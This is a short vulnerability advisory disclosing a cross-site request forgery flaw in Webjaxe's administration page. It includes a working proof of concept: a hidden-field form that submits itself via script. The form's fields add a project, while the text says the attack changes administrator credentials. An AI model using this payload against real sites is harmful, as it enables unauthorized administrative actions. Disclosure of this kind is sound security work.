Cross-site Request Forgery (CSRF) in Webjaxe

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Webjaxe which could be exploited to perform cross-site request forgery attacks.

1. Cross-site request forgery (CSRF) in Webjaxe
   The vulnerability exists due to insufficient validation of the request origin in php/partie_administrateur/administration.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify administrator`s credentials.
   Exploitation example:
   <form action=“http://[host]/php/partie_administrateur/administration.php” method=“post” name=“main” id=“main”>
   <input type=“hidden” name=“action” value=“ajouter_projet”>
   <input type=“hidden” name=“titre_projet” value=“123123”>
   <input type=“hidden” name=“ajouter” value=“Add”>
   <input type=“hidden” name=“submit” value=“OK”>
   <input type=“submit” id=“btn”>
   </form>
   <script>
   document.getElementById(‘btn’).click();
   </script>